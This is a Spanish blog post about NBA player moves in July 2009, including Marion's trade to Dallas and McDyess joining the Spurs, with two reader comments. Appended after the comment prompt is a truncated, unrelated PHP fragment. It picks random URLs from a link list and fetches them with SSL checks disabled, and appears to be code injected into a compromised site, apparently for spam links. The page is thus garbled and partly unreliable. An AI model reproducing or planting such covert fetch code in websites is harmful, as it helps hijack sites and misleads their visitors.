Y Marion a los Mavs

09 de July de 2009 por txusma

Continúa el baíle. Dentro de la vorágine de movimientos de los últimos días hoy nos despertamos con la notícia que Shawn Marion jugará al lado de Dirk Nowitzki y compañía gracias a una complicada operación en la que tambíen están implicados los Memphis Grizzlies. A cambio tan solo pierden a Jerry Stackhouse (que se va a Memphis pero que será cortado), Devean George, Antoine Wright y 3 millones de dólares (que vuelan a Toronto). Como acompañamiento del plato principal del traspaso hay que decir que en Dallas también jugarán Kris Humphries y Greg Buckner y que Quincy Douby pasará de los Raptors a los Grizzlies. Ahora habrá que ver como se adapta Marion al juego de la Mavs en un proyecto que parece tener una fecha de caducidad muy cercana viendo la edad de sus jugadores claves.

Y más movimientos: McDyess ha firmado por los Spurs por 3 años y 15 millones de dólares, con lo que SA potencia enormemente su juego interior, mermado tras las salidas de Oberto y y Kurt Thomas. Recordemos que con el mismo objetivo también se han hecho con los servicios del ex-jugador del Unicaja, Marcus Haislip. Con estas adquisiciones, los Spurs conforman una plantilla que cuenta con el talento y la experiencia necesarias para luchar por cualquier objetivo.

Y más cosas en formato reducido:

Mike Bibby jugará en los Hawks 3 años más a cambio de 18 millones de dólares. Zaza Pachulia también ha llegado a un acuerdo para renovar su contrato.
– Los Pistons han llegado a un acuerdo con Ben Gordon (entre $55 y $60 millones por 5 años) y Charlie Villanueva ($40 millones por 5 años). La salida de RIP Hamilton puede estar cerca.
– Toronto ha renovado a Andrea Bargnani a razón de 10 millones por cada una de las 5 temporadas firmadas. Por favor, que alguien me explique semejante pastizal.
Varejao jugará en los Cavs los próximos 6 años y cobrará por ellos 50 millones de dólares. ¿Quién dijo que habñia crisis?
– Los Bulls se han hecho con los servicios de Jannero Pargo. El ex-jugador del Dinamo de Moscú cobrará 2 millones por una sola temporada.
Chris “Birdman” Andersen ha renovado por los Nuggets por $26 Millones y 5 temporadas.
– Los Blazers siguen buscando gastarse el dinero en un suplente para Lamarcus Aldridge. Ahora el objetivo es Paul Millsap.
– Los Grizzlies están interesados en Allen Iverson al que ofrecerán 5 millones de dólares por una temporada.

Comenta

2 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Buenoooo. Dallas no pierde nada con la llegada de Marion. Al menos yo lo sigo considerando como un jugador que puede ser útil… quizás a cualquiera más que a Dallas que teóricamente siguen teniendo a Josh Howard como su 3 titular y que no lo hizo mal en la postemporada. El asunto es que los sigo viendo en tierra de nadie con Kidd y/o Marion o sin ellos. Al menos ya se han librado de Devean George.

    Quien mola de verdad son los Spurs. Quinteto: Parker, Ginobili, Jefferson, Duncan y McDyess… diría sin meditarlo demasiado que bien puede ser el mejor de la NBA y los suplentes que están incorporando tampoco me parecen mancos.

    De Bibby y Pachulia. Supongo que lo esperábamos todos. Si los Hawks trincan a Childress les sigue quedando un equipo estupendo para el año que viene.
    Los Pistons también muy bien… Me gusta (con reservas) su lavado de cara y seguro que todavía no han acabado de moverse ni de lejos. Tienen importante capital humano para mover…

    Hubo un tiempo en que pensaba en que Toronto era uno de los equipos que más coherentemente hacían las cosas en la NBA. ¿10 kilos por 5 años por Bargani?? Pero ¿en qué c… están pensando los degeneraos??? ¿Vale lo mismo Bargnani que Turkoglu hoy por hoy??? Y eso que el turco ya parece sobrepagado… Anda que lo de Varejao es para cagarse. No sé si lo que intentan los Cavs es convencer a Lebrón de que se quede o de que se largue.

    Lo de Iverson me parece increíble… y muy lamentable. Es una de las devaluaciones más rápidas que he visto en mi vida.

      Citar

  2. Txusma dice:
    #2

    Es que ademas hay q tener en cuenta que el limite salarial ha sido rebajado por lo que ese dinero q se les paga a los Varejao, Bargnani y compañía aún es más sorprendente. En serio, lo de Bargnani es que no me lo creo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>